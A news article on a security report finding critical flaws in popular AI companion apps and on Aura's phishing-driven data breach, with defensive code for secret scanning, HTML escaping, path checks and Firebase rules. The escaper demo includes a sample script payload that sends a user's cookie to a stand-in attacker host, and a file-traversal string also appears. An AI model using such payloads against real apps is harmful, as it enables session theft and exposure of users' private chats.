Aura breach and AI companion app flaws sharpen privacy fears

A new security report on AI girlfriend and companion apps is drawing added attention because it arrives just as identity protection company Aura is dealing with its own data exposure incident, underscoring the broader risk of companies collecting intimate user information and failing to fully protect it.
Aura said an unauthorized party accessed about 900,000 records after a targeted phone phishing attack on an employee, while the companion app report says 17 popular Android apps with a combined 150 million-plus installs contain 14 critical flaws and 311 high-severity issues, including vulnerabilities that could expose users’ erotic chat histories.
According to the report, published by mobile application security company Oversecured, the problem is not simply that these apps are popular, but that they are built around some of the most sensitive disclosures users make anywhere online.
Oversecured says the apps it examined include products explicitly marketed as AI girlfriends, AI boyfriends, dating simulators, and roleplay platforms, while several others present themselves more broadly as character or chat apps but still host large volumes of romantic and sexual roleplay.
The report says users disclose explicit sexual content, relationship problems, sexual orientation, suicidal thoughts, and domestic conflicts, and that these conversations are often stored server-side and in some cases cached locally on users’ devices.
Oversecured says ten of the 17 apps it reviewed contained flaws that create a path to users’ conversation histories, and six of those apps had critical vulnerabilities specifically capable of exposing chat data.
Three of those six apps had more than 10 million downloads each, and one had more than 50 million downloads, according to the report.
The company says the most severe findings included hardcoded cloud credentials embedded in app code, a cross-site scripting flaw that would allow code injection directly into a chat interface, and a file theft vulnerability in an app known for not-safe-for-work content.
The report lays out how those flaws could work in practice.
In one app with 10 million downloads, Oversecured says it found both an OpenAI API token and a Google Cloud service account private key hardcoded in the APK, potentially allowing access not only to the app’s AI backend but also to billing infrastructure and, if stored in the same cloud project, the full chat database.
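Findings like that are typically surfaced by decompiling the APK and scanning its string constants for known credential formats. A minimal sketch of that kind of scan, assuming publicly documented token shapes (the "sk-" prefix for OpenAI API keys, the JSON layout of a Google Cloud service account key); the sample strings are invented for the demo:

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Illustrative static scan for hardcoded credentials in strings pulled
// from a decompiled APK. Patterns and samples are for demonstration only.
public class SecretScan {
    private static final List<Pattern> PATTERNS = List.of(
        Pattern.compile("sk-[A-Za-z0-9]{20,}"),                 // OpenAI-style API key
        Pattern.compile("\"private_key\"\\s*:\\s*\"-----BEGIN") // GCP service account JSON
    );

    static List<String> findSecrets(List<String> decompiledStrings) {
        List<String> hits = new ArrayList<>();
        for (String s : decompiledStrings) {
            for (Pattern p : PATTERNS) {
                if (p.matcher(s).find()) {
                    hits.add(s);
                    break;
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        List<String> strings = List.of(
            "https://api.example.com/v1/chat",
            "sk-abcdefghijklmnopqrstuvwxyz123456",              // fake key for the demo
            "{\"type\":\"service_account\",\"private_key\":\"-----BEGIN PRIVATE KEY-----\"}"
        );
        System.out.println(findSecrets(strings).size()); // prints 2
    }
}
```

The same idea scales to real tooling: any string shipped inside the APK is readable by anyone who downloads the app, which is why credentials belong on the server side, never in client code.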
In another app with 10 million downloads, a cross-site scripting flaw in an exported WebView could allegedly let an attacker inject JavaScript into the chat interface, read conversations on screen in real time, steal session tokens tied to full server-side histories, and inject fake messages into what users believe is a private exchange.
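The core defect in a flaw like that is attacker-controlled text reaching the WebView as live markup rather than inert data. A minimal sketch of the standard mitigation, escaping untrusted text before it is rendered in a chat view (the helper is hand-rolled for illustration, not an Android API):

```java
// Illustrative HTML-escaping of user- or network-controlled chat text,
// so injected markup is displayed as text instead of executed as code.
public class ChatEscaper {
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&'  -> out.append("&amp;");
                case '<'  -> out.append("&lt;");
                case '>'  -> out.append("&gt;");
                case '"'  -> out.append("&quot;");
                case '\'' -> out.append("&#39;");
                default   -> out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String attack = "<script>fetch('https://evil.example/?c='+document.cookie)</script>";
        // After escaping, the <script> tag is inert text, not executable code.
        System.out.println(escapeHtml(attack));
    }
}
```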
In a separate app with 1 million downloads, Oversecured says an arbitrary file theft flaw could expose local chat databases, cached photos, voice messages, and authentication tokens.
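Arbitrary file theft flaws of this kind usually stem from an app serving whatever path a caller requests without confirming it stays inside the app's private storage, so a request for something like `../databases/chats.db` escapes the intended directory. A minimal sketch of the canonical-path check that closes that hole (paths here are illustrative):

```java
import java.io.File;
import java.io.IOException;

// Illustrative path-traversal guard: resolve a requested path to its
// canonical form and confirm it stays inside the app's private directory.
public class SafeFileAccess {
    static boolean isInsideDir(File baseDir, String requestedPath) {
        try {
            String base = baseDir.getCanonicalPath() + File.separator;
            String resolved = new File(baseDir, requestedPath).getCanonicalPath();
            return resolved.startsWith(base);
        } catch (IOException e) {
            return false; // fail closed if the path cannot be resolved
        }
    }

    public static void main(String[] args) {
        File appFiles = new File("/data/data/com.example.chat/files");
        System.out.println(isInsideDir(appFiles, "avatars/cat.png"));       // true
        System.out.println(isInsideDir(appFiles, "../databases/chats.db")); // false
    }
}
```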
The report also points to a supply chain style risk in one app with more than 50 million installs.
Oversecured says an ad software development kit allowed arbitrary component launch and content provider access, which in turn could permit direct queries to internal conversation tables through a malicious ad creative.
In another app with more than 10 million installs, Oversecured says arbitrary component launch combined with a hardcoded token could expose authentication and session data or redirect users to an attacker-controlled phishing page made to resemble a legitimate app screen.
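Both of those findings turn on app components, including content providers, being reachable from outside the app. On Android that exposure is governed by the `android:exported` attribute in the manifest; a hedged illustrative fragment of the hardened configuration (component and authority names are hypothetical, not taken from the report):

```xml
<!-- Illustrative manifest hardening; names are hypothetical. -->
<provider
    android:name=".ChatHistoryProvider"
    android:authorities="com.example.chat.history"
    android:exported="false" />  <!-- not queryable by other apps or ad creatives -->

<activity
    android:name=".InternalWebViewActivity"
    android:exported="false" />  <!-- cannot be launched by arbitrary external intents -->
```

Components that genuinely must be exported should additionally be gated behind a custom permission, so an ad SDK or third-party app cannot walk straight into internal conversation tables.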
Oversecured argues that the findings fit a pattern rather than an isolated problem.
The report cites two previous AI companion-related exposures. One, in October 2025, involved Chattee Chat and GiMe Chat, which exposed 43 million messages and 600,000 photos from more than 400,000 users through an unprotected server.
In February of this year, another AI chat app exposed 300 million messages from 25 million users through a Firebase misconfiguration.
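A Firebase exposure on that scale typically traces back to database security rules that permit unauthenticated reads. A minimal sketch of the locked-down alternative, restricting each user's messages to their own authenticated account (collection names are hypothetical):

```
// Illustrative Firestore security rules; collection layout is hypothetical.
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /users/{userId}/messages/{messageId} {
      // Only the authenticated owner may read or write their messages.
      allow read, write: if request.auth != null
                         && request.auth.uid == userId;
    }
  }
}
```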
Oversecured says the vulnerabilities it found, including hardcoded credentials, injectable WebViews, and file access flaws, can lead to the same kind of large-scale exposure.
A central point of the report is that these apps sit in what it calls a regulatory blind spot.
Oversecured says no regulator in any jurisdiction has yet taken enforcement action against an AI companion app for application layer security flaws, even though regulators have investigated or sanctioned some of the same companies over privacy disclosures, age verification, and child safety.
The report notes that the Federal Trade Commission (FTC) sent compulsory information orders to Alphabet, Character Technologies, Instagram, Meta Platforms, OpenAI OpCo, Snap, and X.AI Corp. in September 2025, but that the inquiry focused on harms to children rather than how companion apps store and secure conversation data.
The FTC said it wanted to know what steps companies had taken to evaluate chatbot safety, limit harmful effects on minors, restrict children’s or teens’ use where appropriate, and comply with the Children’s Online Privacy Protection Act Rule.
Oversecured also points to new California and New York laws requiring disclosures and suicide prevention measures, and to Italy’s €5 million fine against Replika’s developer over GDPR-related violations as examples of governments acting on privacy and youth protection issues without squarely addressing app layer security.
The Aura incident gives that argument more immediate resonance. Aura said the unauthorized access affected data in a marketing tool associated with a company it acquired in 2021 and that fewer than 20,000 active Aura customers and fewer than 15,000 former customers were affected.
The company said no database supporting its identity theft protection application was accessed and that no Social Security numbers, financial information, credit records, or passwords were compromised.
Have I Been Pwned, a public breach notification service that lets users check whether their email addresses have appeared in known data breaches, added the breach to its database, saying the exposed data included 900,000 unique email addresses and could also include names, phone numbers, physical and IP addresses, and customer service comments.
The Aura breach did not involve AI companions or erotic chat histories, but together the two incidents sharpen the concern about what happens when companies persuade users to hand over highly personal information and then fail to secure every layer of the systems that store it.
In the case of AI companion apps, Oversecured’s answer is that the consequences could be especially severe because the compromised material may include sexual conversations, confessions, emotional dependency, and records tied to real user identities.
The report says that while regulators have focused on who should use these apps and what harms they may cause, they have not yet dealt with the simpler and more basic issue of whether the apps can keep those conversations private.